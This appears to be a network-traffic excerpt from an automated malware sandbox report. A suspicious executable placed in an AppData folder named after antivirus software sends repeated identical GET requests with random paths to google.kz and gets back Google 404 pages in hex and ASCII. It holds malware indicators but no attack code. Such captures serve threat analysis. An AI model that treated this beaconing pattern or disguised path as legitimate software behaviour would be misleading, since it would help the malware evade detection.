Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.16	49751	172.217.19.164	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:03.765852928 CET	74	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Dec 1, 2024 22:52:05.369508028 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:05 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:05.369558096 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:05.401010036 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Dec 1, 2024 22:52:05.521019936 CET	350	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Dec 1, 2024 22:52:05.641165972 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Dec 1, 2024 22:52:05.925657988 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Dec 1, 2024 22:52:06.011497021 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:05 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:06.011523008 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:06.011564016 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Dec 1, 2024 22:52:06.199054003 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:05 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:06.199074030 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:06.306850910 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:06.306924105 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:06.400722027 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:06.400784016 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:06.501713037 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:06.501779079 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:06.602384090 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:06.602410078 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:06.703200102 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 